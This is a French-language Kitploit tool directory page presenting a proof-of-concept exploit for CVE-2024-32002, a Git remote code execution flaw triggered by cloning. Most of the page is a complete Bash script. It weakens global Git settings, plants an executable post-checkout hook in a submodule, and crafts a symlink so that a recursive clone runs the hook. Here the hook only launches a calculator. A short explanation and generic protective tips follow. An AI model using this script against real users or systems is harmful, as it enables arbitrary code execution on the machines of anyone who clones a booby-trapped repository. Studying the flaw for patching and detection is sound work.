Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-32002-poc — CVE-2024-32002 est une grave vulnérabilité dans Git qui permet à un attaquant d'exécuter du code arbitraire à distance (RCE) lorsqu'un utilisateur effectue une opération git clone. | Kitploit
Outils/GitHubGitHub/bohemianhacks/cve-2024-32002-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubbohemianhacks/cve-2024-32002-poc

CVE-2024-32002-poc

CVE-2024-32002 est une grave vulnérabilité dans Git qui permet à un attaquant d'exécuter du code arbitraire à distance (RCE) lorsqu'un utilisateur effectue une opération git clone.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
11il y a 1 anPas encore vérifié

Script Bash :

root@kitploit:~
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# Avoid warning messages (set default branch to main)
git config --global init.defaultBranch main 

# Define tell-tale path
tell_tale_path="$PWD/tell.tale"

# Initialize hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write malicious code to hook, compatible with Windows and macOS
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# Make hook executable: important
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# Define hook repository path
hook_repo_path="$(pwd)/hook"

# Initialize captain repository
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# Create symbolic link
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# Local testing (not needed for GitHub)
git clone --recursive captain hooked

Explication simple en anglais :

Ce script Bash crée un dépôt Git malveillant qui exploite une vulnérabilité (CVE-2024-32002) pour exécuter du code malveillant lorsqu'une personne clone le dépôt.

Voici un détail de ce que fait le script :

  1. Configure Git : Active certaines fonctionnalités nécessaires à l'attaque.
  2. Crée un dépôt de hooks malveillant : Ce dépôt contient un script caché qui s'exécutera lorsque quelqu'un le clonera.
  3. Crée un dépôt trompeur : Ce dépôt, nommé "captain", semble inoffensif mais contient secrètement le dépôt de hooks malveillant en tant que sous-module.
  4. Ajoute un lien symbolique : Cette astuce est utilisée pour cacher le hook malveillant et le faire exécuter lors du clonage du dépôt.

Lorsque quelqu'un clone le dépôt "captain", le script malveillant s'exécutera sur son ordinateur, pouvant entraîner des conséquences graves comme :

  • Installation de logiciels malveillants : Le script pourrait télécharger et installer des programmes nuisibles.
  • Vol de données : Il pourrait dérober des informations sensibles sur l'ordinateur de la victime.
  • Compromission du système : Le script pourrait obtenir un accès non autorisé au système.

Pour vous protéger de telles attaques :

  • Maintenez votre client Git à jour : Assurez-vous d'avoir la dernière version pour corriger les vulnérabilités.
  • Soyez prudent lors du clonage de dépôts : Clonez uniquement des dépôts provenant de sources fiables.
  • Utilisez un antivirus réputé : Cela peut aider à détecter et bloquer les logiciels malveillants.
  • Méfiez-vous des attaques de phishing : Évitez de cliquer sur des liens suspects ou de télécharger des fichiers provenant de sources inconnues.

En suivant ces précautions, vous pouvez réduire considérablement le risque d'être victime d'attaques similaires.

Télécharger l’outil